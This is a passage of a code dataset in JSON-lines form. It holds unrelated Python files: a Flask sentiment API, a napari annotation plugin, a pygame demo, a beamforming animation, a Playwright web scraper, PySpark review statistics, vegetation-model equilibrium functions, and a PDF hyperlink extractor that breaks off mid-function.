flask import Flask, render_template, request, jsonify\n\napp = Flask(__name__)\n\n@app.route('/predict', methods=['POST'])\ndef process_text():\n data = request.json\n input = data.get('text')\n\n input=input.lower()\n #Removing URLs\n input=cleaning_URLs(input)\n #Removing punctuations\n input=remove_punctuation(input)\n #Removing numbers\n input=cleaning_numbers(input)\n #removing stopwords\n input=remove_stopwords(input)\n #Removing repeating characters\n input=remove_repeating_characters(input)\n #Tokenizing\n input=tokenize(input)\n #lemmantizing\n input=lemmatization(input)\n #joining tokens\n input=\" \".join(input)\n\n bow_input = bow_vectorizer.transform([input])\n bow_pred = model.predict(bow_input)\n\n if bow_pred[0]==0:\n sentiment='Negative'\n else:\n sentiment='Positive'\n \n return jsonify({'processed_text':sentiment})\n\nif __name__ == '__main__':\n app.run(debug=True)\n\n","repo_name":"ParthSingh0306/Twitter-Sentimental-Analysis","sub_path":"api/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"26200954589","text":"\"\"\"\nAnnotate segmentation with text\n===============================\n\nPerform a segmentation and annotate the results with\nbounding boxes and text\n\n.. tags:: analysis\n\"\"\"\nimport numpy as np\nimport skimage\nfrom skimage import data\nfrom skimage.filters import threshold_otsu\nfrom skimage.segmentation import clear_border\nfrom skimage.measure import label, regionprops_table\nfrom skimage.morphology import closing, square, remove_small_objects\nimport napari\nfrom magicgui import magicgui\nfrom magicgui.widgets import FunctionGui\nfrom napari import Viewer\nfrom napari.types import ImageData, LabelsData, LayerDataTuple\n \n \n@magicgui(call_button='Save Annotation')\ndef save_annotation(viewer: Viewer) -> None:\n global label_path\n global label_name\n image = viewer.layers[label_name]\n skimage.io.imsave(label_path,image.data)\n print(\"Saved Image\")\n \n \nfrom PIL import Image\nimport matplotlib.pyplot as plt\n\n \nmicro_image = skimage.io.imread(\"loading_screen.jpg\")\nlabel_image = skimage.io.imread(\"loading_screen_overlay.png\")\n\ndef RGB_to_scaled_RGBA(RGB_tuple):\n return (RGB_tuple[0]/255,RGB_tuple[1]/255,RGB_tuple[2]/255,1.0)\n\n\ncolor_dict = {\n \"1M-Qt\":RGB_to_scaled_RGBA((130, 180, 187)),\n \"2M-Qt\":RGB_to_scaled_RGBA((38, 119, 120)),\n \"3M-Qt\":RGB_to_scaled_RGBA((37, 94, 121)),\n \"1M-Mx\":RGB_to_scaled_RGBA((174, 60, 96)),\n \"2M-Mx\":RGB_to_scaled_RGBA((223, 71, 60)),\n \"1M-Tm\":RGB_to_scaled_RGBA((243, 195, 60))}\n\ncolor_dict_with_one_based_index = dict(zip([1,2,3,4,5,6],color_dict.values()))\n\nviewer = napari.view_image(micro_image, name='micro_image', rgb=False)\nlabel_layer = viewer.add_labels(label_image, name='segmentation',color=color_dict_with_one_based_index)\n\n\n#empty_widget = EmptyGui()\n#viewer.window.add_dock_widget(empty_widget, area='right')\n\n##############\n#qt Widget\nimport sys\nfrom PyQt5.QtWidgets import QApplication, QLabel\nfrom PyQt5.QtGui import QPixmap\n\nclass ImageWidget(QLabel):\n def __init__(self, parent=None):\n super().__init__(parent)\n\n def set_image(self, file_path):\n pixmap = QPixmap(file_path)\n self.setPixmap(pixmap)\n\nimage_widget = ImageWidget()\nimage_widget.set_image('colormap_white.png')\n\n\n###################\n\n\n\n###\n#file viewer widget \n\nimport os\n\nimport pathlib\nfrom pathlib import Path\n\n\n\nbase_path = None\n\n@magicgui(fn={'mode': 'd'}, call_button='Scan Directory')\n#def path_widget(fn = pathlib.Path.home()):\ndef path_widget(fn = Path(os.getcwd())):\n print(fn)\n global base_path\n base_path = fn\n list_images(base_path)\n \n#########\n\nimport os\nimport glob\n\n\n\n#@magicgui(call_button='Scan Files')\ndef list_images(path)->list:\n \"\"\"\n A magicgui widget that takes a path and lists all .png images in that path\n \"\"\"\n print(\"Scanning Directory...\")\n #path = base_path\n #png_files = [entry.name for entry in os.scandir(path) if entry.name.endswith('.png') and entry.is_file()]\n\n def scantree(path):\n \"\"\"Recursively yield DirEntry objects for given directory.\"\"\"\n for entry in os.scandir(path):\n if entry.is_dir(follow_symlinks=False):\n yield from scantree(entry.path) # see below for Python 2.x\n else:\n yield entry\n \n global png_files\n \n png_files = {}\n \n for entry in scantree(base_path):\n if entry.name.endswith('_mic.tif') and entry.is_file():\n png_files[entry.name] = entry.path\n \n \n png_files = {key:png_files[key] for key in sorted(png_files.keys())}\n \n print(png_files)\n \n global selector\n selector.x.choices = png_files.copy().keys()\n #selector.update_args()\n\n return png_files\n\n\n####\n\nglobal png_files\n\npng_files = {}\n\nmicro_path = None\nlabel_path = None\nlabel_name = None\n\n\n@magicgui(x=dict(widget_type='Select', choices=png_files.keys()))\ndef selector(x):\n update = False\n \n png_key = x[0]\n \n global png_files \n \n print(\"PNG KEYS: \")\n print(png_files.keys())\n \n if png_key is not None:\n global micro_path\n global label_path\n micro_path = png_files[png_key]\n label_path = micro_path.rstrip(\"_mic.tif\")+\"_label.tif\"\n new_micro_image = skimage.io.imread(micro_path)\n try:\n new_label_image = skimage.io.imread(label_path)\n except:\n print(\"no label found\")\n update = True\n \n \n if update:\n global viewer \n try:\n viewer.layers.remove(viewer.layers[0])\n except:\n print(\"could not remove layers\")\n \n \n try:\n viewer.layers.remove(viewer.layers[0])\n except:\n print(\"could not remove layers\")\n \n \n \n global label_name\n label_name = 'seg:'+str(label_path.split(\"/\")[-1])\n viewer.add_image(new_micro_image,name='mic:'+str(micro_path).split(\"/\")[-1])\n try: \n label_layer = viewer.add_labels(new_label_image, name=label_name,color=color_dict_with_one_based_index)\n except:\n pass\n \n selector.x.choices = png_files.copy().keys()\n\n\n print(x)\n \n \n #viewer = napari.view_image(new_micro_image, name='micro_image', rgb=False)\n #label_layer = viewer.add_labels(new_label_image, name='segmentation',color=color_dict_with_one_based_index)\n\n\n#@magicgui(call_button='call')\n##def path_widget(fn = pathlib.Path.home()):\n#def empty_widget():\n# print(\"hit\")\n# def path_widget(fn = Path(os.getcwd())):\n# print(fn)\n# global base_path\n# base_path = fn\n\n\n\n\n\nsave_annotation_widget = viewer.window.add_dock_widget(save_annotation)\nsave_annotation_widget.name = \"Save Annotation\"\n\n#viewer.window.add_dock_widget(display_image)\ncolor_widget = viewer.window.add_dock_widget(image_widget,area=\"left\")\ncolor_widget.name = \"Color Reference\"\n\npath_selector = viewer.window.add_dock_widget(path_widget,area=\"right\")\npath_selector.name = \"Path Selector\"\n#viewer.window.add_dock_widget(list_images,area=\"right\")\n\nfile_display_widget = viewer.window.add_dock_widget(selector,area=\"right\")\nfile_display_widget.setFixedHeight(650)\nfile_display_widget.name = \"Image Selector\"\nselector.x.min_height = 600\n\n#list_view = selector.x.widget.list_view\n#list_view.setFixedHeight(400)\n\n\n\n\n\n\nimport code\ncode.InteractiveConsole(locals=globals()).interact()\n","repo_name":"MartGro/EMcapsulin_Toolbox","sub_path":"napari_plugin/napari_plugin_tif.py","file_name":"napari_plugin_tif.py","file_ext":"py","file_size_in_byte":6335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"83"} +{"seq_id":"682514460","text":"import pygame\n\npygame.init()\n\n# CORES\nVERMELHO = (255, 0, 0)\nAZUL = (0, 0, 255)\nVERDE = (0, 255, 0)\nBRANCO = (255, 255, 255)\nPRETO = (0, 0, 0)\nCINZA = (150, 150, 150)\n\n# DIMENSÕES DA TELA\nALTURA = 600\nLARGURA = 800\n\n# DEFINIÇÕES DA JANELA\ntela = pygame.display.set_mode([LARGURA, ALTURA])\ntela.fill(CINZA)\npygame.display.set_caption(\"Minha primeira tela\")\n\n# CLOCK DO JOGO\nclock = pygame.time.Clock()\n\n# SUPERFÍCIES\nsuperficie = pygame.Surface([760, 560])\nsuperficie.fill(BRANCO)\n\n# RETÂNGULOS\nquadrado = pygame.Rect(100, 100, 50, 50)\n\n# LOOP DO JOGO\nexecutando = True\nwhile executando:\n\n\t# VERIFICANDO EVENTOS\n\tfor evento in pygame.event.get():\n\n\t\t# EVENTO DE FECHAR A TELA\n\t\tif evento.type == pygame.QUIT:\n\t\t\texecutando = False\n\n\t\t# EVENTOS DE TECLA PRESSIONADA\n\t\tif evento.type == pygame.KEYDOWN:\n\t\t\tif evento.key == pygame.K_DOWN:\n\t\t\t\tquadrado.move_ip([0, 20])\n\t\t\tif evento.key == pygame.K_UP:\n\t\t\t\tquadrado.move_ip([0, -20])\n\t\t\tif evento.key == pygame.K_LEFT:\n\t\t\t\tquadrado.move_ip([-20, 0])\n\t\t\tif evento.key == pygame.K_RIGHT:\n\t\t\t\tquadrado.move_ip([20, 0])\n\n\t# ELEMENTOS DA TELA\n\ttela.blit(superficie, [20, 20])\n\tpygame.draw.rect(tela, VERMELHO, quadrado)\n\n\t# CONFIGURAÇÃO DE QUADROS\n\tclock.tick(27)\n\tpygame.display.update()\n\npygame.quit()","repo_name":"jjpaulo2/minicurso-pygame-vii-seifpi","sub_path":"jogo.py","file_name":"jogo.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"27020667611","text":"import waves\nfrom tqdm import tqdm\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport cv2\nimport imageio\n\n\nif __name__ == \"__main__\":\n ############\n \"\"\"let 1 px = 1um\"\"\"\n LAMBDA = 40\n HEIGHT = 600\n WIDTH = 400\n TRANSMITTERS = 20\n ############\n disp = np.zeros((HEIGHT,WIDTH))\n sources = []\n frames = []\n for i in range(-int(TRANSMITTERS/2), int(TRANSMITTERS/2)):\n sources.append(waves.Point_Source(WIDTH/2 + 10*i, HEIGHT-10, LAMBDA))\n\n for phi in tqdm(np.linspace(-np.pi/4, np.pi/4, 50), desc = \"generating frames\"):\n disp = np.zeros((HEIGHT,WIDTH))\n for s in range(len(sources)):\n sources[s].alter_phase(s * phi)\n sources[s].gen_wave(disp)\n disp = disp**2 # obtain intensity\n disp = np.array(255 * disp / np.max(disp), dtype=np.uint8)\n for s in range(len(sources)):\n disp = cv2.circle(disp, (sources[s].x, sources[s].y), 3, (255,0,255), 2)\n frames.append(disp)\n frames.extend(frames[::-1])#reverse pass\n imageio.mimwrite(\"beamforming.gif\", np.array(frames).astype(np.uint8), format= '.gif', fps = 20)\n \n","repo_name":"mathster101/Wave-Interference","sub_path":"beamforming_animation.py","file_name":"beamforming_animation.py","file_ext":"py","file_size_in_byte":1144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"14473727352","text":"import os\nfrom dotenv import load_dotenv, find_dotenv\nfrom playwright.sync_api import sync_playwright, Page, Locator\nimport time\nimport random\nfrom typing import List, Dict, Any, Union, Iterator\nfrom configparser import ConfigParser\nfrom fake_useragent import UserAgent\nfrom parser import Parser\nfrom log import logger\n\n\nclass Scraper:\n def __init__(\n self,\n debug_mode: bool,\n start_url: str,\n proxy: str,\n output_file: str,\n mapping_file: Dict,\n wait_time: List,\n random_user_agent: bool,\n ) -> None:\n \"\"\"\n Initialize the Scraper object.\n\n Args:\n debug_mode (bool): Enable or disable debug mode for extra logging.\n start_url (str): The URL to start scraping from.\n proxy (str): The proxy server to be used for making HTTP requests.\n output_file (str): The file to store the scraped data.\n mapping_file (str): The file containing the mapping configuration.\n wait_time (list): Range of time to wait between consecutive requests.\n random_user_agent (bool): Use random user agents for each request.\n logger (logging.Logger): The logger object to handle logging.\n \"\"\"\n\n self.mapping = mapping_file\n self.debug_mode = debug_mode\n self.start_url = start_url\n self.proxy = proxy\n self.output_file = output_file\n self.wait_time = wait_time\n self.random_user_agent = random_user_agent\n if debug_mode:\n logger.enable_debug_mode()\n\n def delayed_click(self, element: Locator) -> None:\n \"\"\"\n Perform a delayed click on the provided Playwright Locator.\n\n Args:\n element (Locator): The Playwright Locator representing the element to click.\n\n Raises:\n TimeoutError: If the element does not become visible within the specified time range.\n \"\"\"\n if element.is_visible():\n wait_time = round(random.uniform(self.wait_time[0], self.wait_time[1]), 2)\n logger.info(f\"Waiting for {wait_time} seconds\")\n time.sleep(wait_time)\n element.click()\n else:\n logger.error(\"Element not visible. Click action timed out.\")\n raise TimeoutError(\"Element not visible. Click action timed out.\")\n\n def scrape_data_from_page(self, page: Page) -> Dict[str, List[Any]]:\n \"\"\"\n Scrape data from the given page using the provided mapping.\n\n Args:\n page (Page): The Playwright Page object representing the web page to scrape.\n\n Returns:\n Dict[str, List[Any]]: A dictionary containing the scraped data.\n The keys represent the data names, and the values are lists of scraped data.\n \"\"\"\n scraped_data = {}\n\n for item in self.mapping['scrape']:\n name = item['name']\n xpath = item['xpath']\n element_type = item['type']\n\n page.wait_for_selector(xpath)\n\n elements = page.query_selector_all(xpath)\n if elements:\n values = [Parser.validate_element(element_type, element.inner_text()) for element in elements]\n scraped_data[name] = values\n\n return scraped_data\n\n def scrape_data_from_all_pages(self, page: Page) -> Iterator[Dict[str, List[Any]]]:\n \"\"\"\n Scrape data from all pages using pagination.\n\n Args:\n page (Page): The Playwright Page object representing the initial web page to scrape.\n\n Yields:\n Iterator[Dict[str, List[Any]]]: An iterator yielding dictionaries containing the scraped data.\n Each dictionary represents data from a single page.\n The keys represent the data names, and the values are lists of scraped data.\n The iterator will stop when there are no more visible next pages to scrape.\n \"\"\"\n scraped_data = self.scrape_data_from_page(page)\n yield scraped_data\n\n next_page_button = page.locator(\"xpath=\" + self.mapping['pagination']['next_page_button_xpath'])\n while next_page_button.is_visible():\n self.delayed_click(next_page_button)\n page.wait_for_load_state(\"networkidle\")\n scraped_data = self.scrape_data_from_page(page)\n yield scraped_data\n\n next_page_button = page.locator(\"xpath=\" + self.mapping['pagination']['next_page_button_xpath'])\n\n def initialize_browser_instance(self, playwright, proxy):\n \"\"\"\n Initialize the Playwright browser instance.\n\n If a proxy is provided, set it as a browser context option.\n If a random user agent is needed, set it as a browser context option.\n\n Returns:\n BrowserContext: The initialized Playwright BrowserContext instance.\n \"\"\"\n if proxy:\n logger.info(f'Proxy: {proxy}')\n proxy = {'server': proxy}\n else:\n proxy = None\n browser = playwright.chromium.launch(proxy=proxy, headless=not self.debug_mode)\n\n if self.random_user_agent:\n user_agent = UserAgent().random\n browser.new_context(\n user_agent=user_agent\n )\n logger.info(f'User agent: {user_agent}')\n logger.info(\"Browser initialized succesfully\")\n return browser, browser.new_page()\n\n def main(self) -> None:\n \"\"\"\n Main method to initiate the scraping process.\n\n This method sets up the browser, navigates to the input URL,\n and performs the scraping using 'scrape_data_from_all_pages' method.\n The scraped data is then parsed using 'parse_scraped_data' and saved to the output file.\n\n Raises:\n Exception: If an error occurs during the scraping process.\n \"\"\"\n with sync_playwright() as playwright:\n result: List[Dict[str, Any]] = []\n\n logger.info('Initializing browser')\n browser, page = self.initialize_browser_instance(playwright, self.proxy)\n\n try:\n page.goto(self.start_url)\n page.wait_for_load_state(\"networkidle\")\n except Exception as e:\n logger.error(str(e))\n browser.close()\n if self.restart_without_proxy:\n logger.info('Initializing browser again without proxy')\n browser, page = self.initialize_browser_instance(playwright, None)\n try:\n page.goto(self.start_url)\n page.wait_for_load_state(\"networkidle\")\n except Exception as e:\n logger.error(str(e))\n raise\n else:\n raise\n\n logger.info('Beginning scraping process')\n\n page_number = 0\n try:\n for scraped_data in self.scrape_data_from_all_pages(page):\n page_number += 1\n scraped_data = Parser.dict_with_lists_to_list_of_dicts(scraped_data)\n result.extend(scraped_data)\n logger.info(f\"Page number {page_number} scraped successfully\")\n except Exception as e:\n logger.error(str(e))\n page.screenshot(path='screenshot.png', full_page=True)\n raise\n\n browser.close()\n return result\n\n\nif __name__ == '__main__':\n config = ConfigParser()\n config_file_path = os.path.join(os.path.dirname(__file__), 'config.ini')\n config.read(config_file_path)\n\n env_file = config.get('DEFAULT', 'env_filename')\n\n if '/' in env_file:\n dotenv_path = env_file\n else:\n dotenv_path = find_dotenv(env_file)\n\n load_dotenv(dotenv_path)\n\n scraper = Scraper(config)\n scraper.main()\n","repo_name":"vdcsolutions/scraping_dojo_07_2023","sub_path":"scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":7998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"73993850510","text":"# Read data from HDFS\nuser_data = sc.textFile(\"dbfs:/FileStore/shared_uploads/gauravjoshi0910@gmail.com/user.csv\")\nreview_data = sc.textFile(\"dbfs:/FileStore/shared_uploads/gauravjoshi0910@gmail.com/review.csv\")\n\n# split input files into list\nusers = user_data.map(lambda x : x.split(\"::\"))\nreview = review_data.map(lambda x : x.split(\"::\"))\n\n# Get total number of reviews\ntotal_reviews = review.count()\n\n# sum up all the ratings for business id\nformat_reviews = review.map(lambda x : (x[1], 1)).reduceByKey(lambda x,y: x+y)\n\n# format users based on their id and name\nformat_users = users.map(lambda x : (x[0], x[1]))\n\n# Get the total number of reviews for each user \nusers_with_reviews = format_users.join(format_reviews).map(lambda x : (x[1][0], x[1][1]))\n\n# Get user's contribution\nuser_review_contribution = users_with_reviews.map(lambda x : (x[0], x[1] * 100/total_reviews))\nleast_contributions = user_review_contribution.sortBy(lambda x : x[1])\n\n# format output as required\noutput = least_contributions.map(lambda x:\"{} \\t{}\".format(x[0], x[1]))","repo_name":"gauravjoshi1/big-data-utd","sub_path":"Homework-2/Question5/Question5.py","file_name":"Question5.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"47153829879","text":"\"\"\"This module is used to create the path and select path where\nthe videos downloaded will be put into \"\"\"\n\n# importing modules\nfrom tkinter import filedialog\nimport os\n\n\n# leaf directory\ndirectory = \"downloaded\"\n# Parent directories\nparent_dir = \"C:/Youtube downloader\"\n\n# default path for this program\npath = os.path.join(parent_dir, directory)\n\n# creating a path when user run the program for the first time and return the path to the main file\n# to have it as the default path where videos are save\ndef create_path():\n try:\n os.makedirs(path, exist_ok=True)\n return path\n except Exception as e:\n return\n\n# function to allow user to select a path they want their videos to be downloaded to\ndef select_path(var):\n #allows user to select a path from the explorer\n finding_path = filedialog.askdirectory()\n finding_path = path if finding_path == \"\" else finding_path # setting path back to the default path if user did not select path\n # set stringvar to path\n var.set(finding_path)","repo_name":"JoeLW-12324/Youtube_downloader","sub_path":"path_selection.py","file_name":"path_selection.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"35312372029","text":"\"\"\"\n\nPython 2.7, Encoding: UTF-8\n\nCreated on Fri Apr 12 14:24:24 2019\n\n@author: A.Argles (aa760@exeter.ac.uk)\n\nDescription: Contains the continous form of the equilbrium soultions.\ntime.\n\"\"\"\n\n\nimport numpy as np\nfrom scipy.special import gammainc\nfrom scipy.special import gamma\nfrom scipy.optimize import root\n\n\ndef find_mu_nu_continuous(mu_init,nu_obs,alpha,phi_g,tol = None):\n \"\"\"\n Uses scipy.optimise.root to get the mu value based upon an observed \n coverage.\n \n Inputs:\n \n - mu_init, the \"guessed\" turnover ratio for the irretative process,\n defined as: gamma_init * m_init/g_init (-)\n \n - nu_obs, the observed coverage of a PFT. (-)\n \n - alpha, the reseed fraction. (-)\n \n - phi_g, the growth mass scaling parameter. (-)\n \n - tol, tolerance for termination of the numerical root finding process.\n (-)\n \n \n Outputs:\n \n - mu, the continuous estimate boundary turnover ratio, defined as: \n gamma_init * m_init/g_init. (-)\n \n \"\"\"\n \n args = (alpha,phi_g,nu_obs)\n \n mu = root(Y,mu_init,args = args, jac = dY_dmu, tol = tol).x[0]\n \n return mu\n\n\n\n \n#%% Secondary Functions\n\ndef Y(mu,alpha,phi_g,nu_obs): \n \"\"\"\n Solving for the steady state continuous vegetation fraction, based upon \n the assumed competition of random overlap for seedlings (seedlings only \n grow in non-vegetative areas.), while also subtracting nu_obs.\n \n Inputs:\n \n - mu, the turnover ratio defined as: gamma_init * m_init/g_init (-)\n \n - J, the number of mass classes.\n \n - mult, multiplicative bin scaling parameter. (-)\n \n - nu_eq, the equilibrium vegetation fraction. (-)\n \n - alpha, the reseed fraction. (-)\n \n - phi_g, the growth mass scaling parameter. (-)\n \n Outputs:\n \n - Y, the difference between observed and equilibrium fractions. (-)\n \n Equations are derived in technical notes (needs reference)\n \n Called: \"find_mu_nu\"\n \n \"\"\"\n \n \n Y = nu_eq_analy(mu,alpha,phi_g) - nu_obs\n \n\n return Y\n \n\ndef dY_dmu(mu,alpha,phi_g,nu_obs):\n \n \"\"\"\n Finds the continuous value for the gradient of vegetation fraction with mu.\n \n Inputs:\n \n - mu, the turnover ratio defined as: gamma_init * m_init/g_init (-)\n \n - J, the number of mass classes.\n \n - mult, multiplicative bin scaling parameter. (-)\n \n - nu_eq, the equilibrium vegetation fraction. (-)\n \n - alpha, the reseed fraction. (-)\n \n - phi_g, the growth mass scaling parameter. (-)\n \n Outputs:\n \n - dnu_dmu, discrete solution to the vegetation fraction \n gradient with respect to mu. (-)\n \n Called: - \"find_mu_nu\"\n \n \"\"\" \n \n dY_dmu = nu_eq_analy_dmu(mu,alpha,phi_g)\n \n return dY_dmu\n\n\ndef nu_eq_analy(mu,alpha,phi_g):\n \n \"\"\"\n Finds the analytical form of the equilibrium fraction from mu and alpha.\n \n Inputs:\n \n - mu, the turnover ratio defined as: gamma_init * m_init/g_init (-)\n \n - phi_g, the growth mass scaling parameter. (-)\n \n - alpha, the reseed fraction. (-)\n \n \n Outputs:\n \n - nu_eq, the equilibrium vegetation fraction of a PFT. (-)\n \n \n \"\"\" \n\n r_alpha = (1. - alpha)/alpha\n\n x = 1./(1. - phi_g)\n \n gam = Gam(x,x*mu)\n \n E = np.exp(x*mu)\n\n nu_eq = 1. - r_alpha * mu * (x*mu)**(x-1.0) /(E*gam)\n \n return nu_eq\n \n \n \ndef nu_eq_analy_dmu(mu,alpha,phi_g):\n \"\"\"\n Finding the analytical value for the gradient of vegetation fraction based\n upon the analytical solutions.\n \n Inputs:\n \n - mu, the turnover ratio defined as: gamma_init * m_init/g_init (-)\n \n - alpha, the reseed fraction. (-)\n \n - phi_g, the growth mass scaling parameter. (-)\n \n Outputs:\n \n - dnu_anly_dmu, analytical solution to the vegetation fraction \n gradient. (-)\n \n \n \"\"\" \n \n r_alpha = (1. - alpha)/alpha\n\n x = 1./(1. - phi_g)\n \n gam = Gam(x,x*mu)\n \n E = np.exp(x*mu)\n\n numerator = E * gam * ((x*mu)**x/mu) - \\\n mu *(x*mu)**(x-1.0) * (x * gam * E - (mu * x)**x/mu) \n \n denominator = (E * gam ) **2\n \n dnu_anly_dmu = - r_alpha * numerator / denominator\n \n \n \n return dnu_anly_dmu\n\n\ndef M_tot_eq_analy(mu,nu_eq,m_init,a_init,alpha,phi_g):\n \"\"\"\n Finding the analytical value for the total biomass.\n \n Inputs:\n \n - mu, the turnover ratio defined as: gamma_init * m_init/g_init (-)\n \n - nu_eq, the equilibirum fraction. (-)\n \n - m_init, the mass of a sapling. (kg)\n \n - a_init, the crown area of a sapling. (m^2)\n \n - alpha, the reseed fraction. (-)\n \n - phi_g, the growth mass scaling parameter. (-)\n \n \n Outputs:\n \n - M_tot, the toal vegetation carbon from the equilbirum fraction. \n (kg m^2)\n \n \n \"\"\" \n \n x = 1.0/(1.0 - phi_g)\n \n \n gam = Gam(x + 1.0 , mu * x)\n \n N_eq = N_tot_eq_analy(mu,nu_eq,a_init,alpha,phi_g)\n \n M_eq = m_init * N_eq *(mu*x)**(-x) * np.exp(mu*x) * gam\n\n\n return M_eq\n \n\ndef N_tot_eq_analy(mu,nu_eq,a_init,alpha,phi_g):\n \"\"\"\n Finding the analytical value for the total stand density.\n \n Inputs:\n \n - mu, the turnover ratio defined as: gamma_init * m_init/g_init (-)\n \n - nu_eq, the equilibirum fraction. (-)\n \n - a_init, the crown area of a sapling. (m^2)\n \n - alpha, the reseed fraction. (-)\n \n - phi_g, the growth mass scaling parameter. (-)\n \n \n Outputs:\n \n - N_tot, the toal stand density from the equilbirum fraction. \n (kg m^2)\n \n \n \"\"\" \n \n x = 1.0/(1.0 - phi_g)\n gam = Gam(phi_g*x+1,mu*x)\n \n N_eq = nu_eq* (x*mu)**(x) /(a_init * np.exp(x*mu)*gam) \n \n return N_eq\n \n \ndef Gam(s,x):\n \"\"\"\n Computes the incomplete gamma function from the scipy functions. \n \n Inputs:\n \n Y = Integral[t^(s - 1) exp(-t) dt]{0 -> x}\n \n - s, power of the gamma frunction integral Y. (-)\n \n - x, the upperbound to the integral Y. (-)\n \n Outputs:\n \n - Y, the incomplete gamma funtion. (-)\n \n \"\"\"\n Y = gamma(s) * (1 - gammainc(s,x))\n \n return Y","repo_name":"aargles/RED_DGVM","sub_path":"RED_MODULE/RED_SUBROUTINE/EQUILIBRIUM_ANALYTICAL.py","file_name":"EQUILIBRIUM_ANALYTICAL.py","file_ext":"py","file_size_in_byte":6750,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"83"} +{"seq_id":"38102259714","text":"import re,math,codecs,random\nimport numpy as np\nfrom tqdm import trange\nclass BatchManager(object):\n def __init__(self,data,batch_size,args):\n self.batch_data=self.sort_and_pad(data,batch_size,args)\n self.len_data=len(self.batch_data)\n \n def sort_and_pad(self,data,batch_size,args):\n self.num_batch=int(math.ceil(len(data)/batch_size))\n print(\"num_batch: \",self.num_batch)\n batch_data=list()\n for i in trange(self.num_batch):\n batch_data.append(self.pad_data(data[i*batch_size:(i+1)*batch_size],args))\n \n return batch_data\n @staticmethod\n def pad_data(data,args):\n da0=[]\n da1=[]\n for t in data:\n da0.append(t[0])\n da1.append(t[1])\n return [da0,da1]\n def iter_batch(self,shuffle=True):\n if shuffle:\n random.shuffle(self.batch_data)\n for idx in range(self.len_data):\n yield self.batch_data[idx]\n ","repo_name":"mzl163/AICITY23_Task4","sub_path":"mlp/data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"7304686437","text":"\"\"\"\nGet the words from a PDF\n\npython3 get_links_from_pdf.py /source/to/pdf\n\n----------------------------\n\nExample:\npython3 get_links_from_pdf.py /source/to/pdf --page_start 232 --page_end 254\n\n----------------------------\n\nParameters:\n--page_start [(0,Infinity)]\n Starting page, defaults to 0\n\n--page_end [(0,Infinity)]\n Ending page, defaults to end of document\n\n--paragraph_start [(0,Infinity)]\n Starting paragraph, defaults to 0, the first paragraph\n\n--paragraph_end [(0,Infinity)]\n Ending paragraph, defaults to end of page\n\n----------------------------\n \nOptionals:\n--unique:\n [FLAG] Determines wether to return all links only once\n\"\"\"\n\nimport argparse\nimport logging\nimport os\nimport re\nfrom ast import Dict\nfrom concurrent.futures import ThreadPoolExecutor\nfrom sys import maxsize\nfrom typing import Callable, List\n\nfrom pypdf import PageObject, PdfReader\n\nPARAGRAPH_DELIMITER = \"\\n\\n\"\nINFINITY = maxsize\n\n\ndef get_cli_args():\n \"\"\"Returns the CLI args\"\"\"\n parser = argparse.ArgumentParser(\n prog='get_words_from_pdf',\n description='Gets the words from a PDF and applies some operations to them',\n epilog='Developed by Pepe Fabra Valverde'\n )\n\n # path\n parser.add_argument('filename',\n help=\"Absolute path to the PDF\")\n\n # parameters\n parser.add_argument('--page_start', type=int,\n help=\"Start reading since this page\", default=0)\n parser.add_argument('--page_end', type=int,\n help=\"Stop reading since at this page\", default=INFINITY)\n parser.add_argument('--paragraph_start', type=int,\n help=\"Start reading since this paragraph\", default=0)\n parser.add_argument('--paragraph_end', type=int,\n help=\"Stop reading since at this paragraph\", default=INFINITY)\n\n # optional \"flags\"\n parser.add_argument('-u', '--unique', action='store_true',\n help=\"Determines wether to return all links only once\",\n default=False, required=False)\n\n args = parser.parse_args()\n\n return {\n \"filename\": args.filename,\n \"page_start\": args.page_start,\n \"page_end\": args.page_end,\n \"paragraph_start\": args.paragraph_start,\n \"paragraph_end\": args.paragraph_end,\n \"unique\": args.unique\n }\n\n\ndef get_pdf(filename: str) -> PdfReader:\n \"\"\"Returns the PdfReader instance, or raises an error\"\"\"\n if not os.path.exists(os.path.realpath(filename)):\n raise FileNotFoundError(\"File not found in the system\")\n\n return PdfReader(filename)\n\n\ndef get_pages(pdf_instance: PdfReader, page_start: int, page_end: int) -> List[PageObject]:\n \"\"\"Gets the pages by range\"\"\"\n if len(pdf_instance.pages) <= 0:\n raise ValueError(\"Empty content, no pages were found in the PDF\")\n\n return [\n page\n for index, page in enumerate(pdf_instance.pages)\n if page_start <= index <= page_end\n ]\n\n\ndef subtract_text(\n pages: List[PageObject],\n paragraph_start: int,\n paragraph_end: int,\n on_page_read: Callable[[str], None],\n) -> None:\n \"\"\"Gets the text from the pages, might use a concurrency/parallelism technique\"\"\"\n # evaluate first paragraph clause\n on_page_read(\n PARAGRAPH_DELIMITER.join(\n pages[0]\n .extract_text()\n .split(PARAGRAPH_DELIMITER)[paragraph_start:]\n )\n )\n\n # evaluate the rest\n with ThreadPoolExecutor() as executor:\n executor.map(\n lambda page: on_page_read(page.extract_text()),\n pages[1:-1],\n )\n\n # evaluate last paragraph clause\n on_page_read(\n PARAGRAPH_DELIMITER.join(\n pages[-1]\n .extract_text()\n .split(PARAGRAPH_DELIMITER)[:paragraph_end]\n )\n )\n\n\ndef get_hyperlinks_from_text(text: str) -> List[str]:\n \"\"\"Retrieves all the hyperlinks from a text\"\"\"\n return re.findall(r\"(https?://\\S+)\", text)\n\n\ndef get_hyperlinks(\n pages: List[PageObject],\n paragraph_start: int = 0,\n paragraph_end: int = INFINITY,\n unique: bool = False\n) -> List[str]:\n \"\"\"Returns all the hyperlinks\"\"\"\n 